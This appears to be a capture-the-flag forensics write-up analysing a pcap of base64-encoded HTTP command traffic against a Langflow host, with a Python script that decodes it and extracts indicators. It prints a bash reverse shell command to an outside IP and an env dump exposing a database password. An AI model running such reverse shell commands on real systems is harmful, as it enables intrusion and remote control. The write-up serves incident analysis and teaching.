Watchtower of Mists
Personal Rating: Easy
The challenge starts off with a pcap file. The first thing I like to do with pcap files is to search for any plaintext traffic in Wireshark. HTTP traffic was present and its contents looked suspicious: the requests and responses carried base64-encoded strings rather than normal web content.

Decoding the base64 strings shows the following commands being executed on the target host, each followed by its reply:
whoami
user

id
uid=1000(user) gid=0(root) groups=0(root)

env
TOKENIZERS_PARALLELISM=false
HOSTNAME=aisrv01
PYTHON_PIP_VERSION=24.0
HOME=/app/data
LANGFLOW_DATABASE_URL=postgresql://langflow:LnGFlWPassword2025@postgres:5432/langflow
LANGFLOW_HOST=0.0.0.0
GPG_KEY=7169605F62C751356D054A26A821E680E5FA6305
OPENAI_API_KEY=dummy
ASTRA_ASSISTANTS_QUIET=true
LANGFLOW_PORT=7860
LANGFLOW_CONFIG_DIR=app/langflow
PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/dbf0c85f76fb6e1ab42aa672ffca6f0a675d9ee4/public/get-pip.py
SERVER_SOFTWARE=gunicorn/23.0.0
GRPC_VERBOSITY=ERROR
PATH=/app/.venv/bin:/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
TIKTOKEN_CACHE_DIR=/app/.venv/lib/python3.12/site-packages/litellm/litellm_core_utils/tokenizers
LANG=C.UTF-8
PYTHON_VERSION=3.12.3
PWD=/app
PYTHON_GET_PIP_SHA256=dfe9fd5c28dc98b5ac17979a953ea550cec37ae1b47a5116007395bfacff2ab9
USER_AGENT=langflow

sh -i >& /dev/tcp/131.0.72.0/7852 0>&1

This shows basic enumeration on the target (whoami, id, env), followed by a reverse shell to 131.0.72.0 on port 7852. The `>&` redirection and the /dev/tcp pseudo-device are bash features, so the payload was interpreted by bash even though it spawns `sh -i`. Note also that the env dump leaked the LANGFLOW_DATABASE_URL connection string, password included, which is a finding in its own right.
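The decode-and-pair step above, as an added Python example that is not part of the original writeup. The HTTP framing (a form field named cmd in the requests, a bare base64 body in the responses) and the sample payloads are constructed from the values recovered in the capture; the real challenge traffic may embed the data differently, so only the decoding, pairing and IOC extraction logic is the point here.

```python
"""Decode base64 command/reply blobs from captured HTTP payloads.
Added example for this writeup (not the challenge author's tooling). The HTTP
framing, a form field named cmd in requests and a bare base64 body in
responses, is an assumption made so the sample runs offline."""
from __future__ import annotations

import base64
import re
import string
import urllib.parse

PRINTABLE = set(string.printable)
# bash reverse-shell idiom seen in the capture: /dev/tcp/<host>/<port>
DEV_TCP = re.compile(r"/dev/tcp/([\w.\-]+)/(\d{1,5})")
# scheme://user:password@host[:port], i.e. credentials leaked via an env dump
CRED_URL = re.compile(r"\b[a-z][a-z0-9+.\-]*://([^:/\s@]+):([^@\s]+)@([^\s/]+)")

def decode_b64_text(token: str) -> str | None:
    """Strictly decode one base64 token; None unless it yields printable text."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    if not text or any(ch not in PRINTABLE for ch in text):
        return None  # binary noise, e.g. a hex digest that looks base64-shaped
    return text

def is_response(payload: str) -> bool:
    return payload.startswith("HTTP/")

def candidate_blobs(payload: str) -> list[str]:
    """Base64 candidates from one reassembled HTTP message (headers + body)."""
    _head, _sep, body = payload.partition("\r\n\r\n")
    if is_response(payload):
        return [body.strip()]
    # Request: assumed form-encoded body; parse_qs undoes the %2B/%2F escaping.
    return [v for values in urllib.parse.parse_qs(body).values() for v in values]

def reconstruct_session(payloads: list[str]) -> list[tuple[str, str]]:
    """Pair each decoded command with the decoded reply that follows it."""
    session: list[tuple[str, str]] = []
    pending: str | None = None
    for payload in payloads:
        for blob in candidate_blobs(payload):
            text = decode_b64_text(blob)
            if text is None:
                continue
            if not is_response(payload):
                pending = text
            elif pending is not None:
                session.append((pending, text))
                pending = None
    if pending is not None:
        session.append((pending, ""))  # e.g. the reverse shell: no reply over HTTP
    return session

def extract_iocs(session: list[tuple[str, str]]) -> dict[str, list]:
    """Callback endpoints from the commands, credential URLs from the replies."""
    iocs: dict[str, list] = {"reverse_shell": [], "leaked_credentials": []}
    for command, reply in session:
        iocs["reverse_shell"] += [(m.group(1), int(m.group(2))) for m in DEV_TCP.finditer(command)]
        iocs["leaked_credentials"] += [m.group(0) for m in CRED_URL.finditer(reply)]
    return iocs

# --- Constructed sample traffic; values are the ones recovered from the capture above ---
def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()

def _req(command: str) -> str:
    body = urllib.parse.urlencode({"cmd": _b64(command)})
    return ("POST /run HTTP/1.1\r\nHost: aisrv01\r\nUser-Agent: langflow\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + body)

def _resp(text: str) -> str:
    return "HTTP/1.1 200 OK\r\nServer: gunicorn/23.0.0\r\n\r\n" + _b64(text)

ENV_DUMP = ("HOSTNAME=aisrv01\n"
            "LANGFLOW_DATABASE_URL=postgresql://langflow:LnGFlWPassword2025@postgres:5432/langflow\n"
            "PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/dbf0c85f76fb6e1ab42aa672ffca6f0a675d9ee4/public/get-pip.py\n")

SAMPLE_PAYLOADS = [
    _req("whoami"), _resp("user\n"),
    _req("id"), _resp("uid=1000(user) gid=0(root) groups=0(root)\n"),
    _req("env"), _resp(ENV_DUMP),
    _req("sh -i >& /dev/tcp/131.0.72.0/7852 0>&1"),
]

if __name__ == "__main__":
    recovered = reconstruct_session(SAMPLE_PAYLOADS)
    for command, reply in recovered:
        print(f"$ {command}\n{reply}", end="")
    print(extract_iocs(recovered))
```

In a real analysis SAMPLE_PAYLOADS would be filled from the reassembled streams (for example via Wireshark's Follow TCP Stream) instead of being constructed. The strict decode plus printable check matters because hex digests such as the PYTHON_GET_PIP_SHA256 value are valid base64 by length and alphabet but decode to binary junk, and the unmatched trailing command is kept deliberately: the reverse shell never produces an HTTP reply, since its output goes out over the new TCP connection.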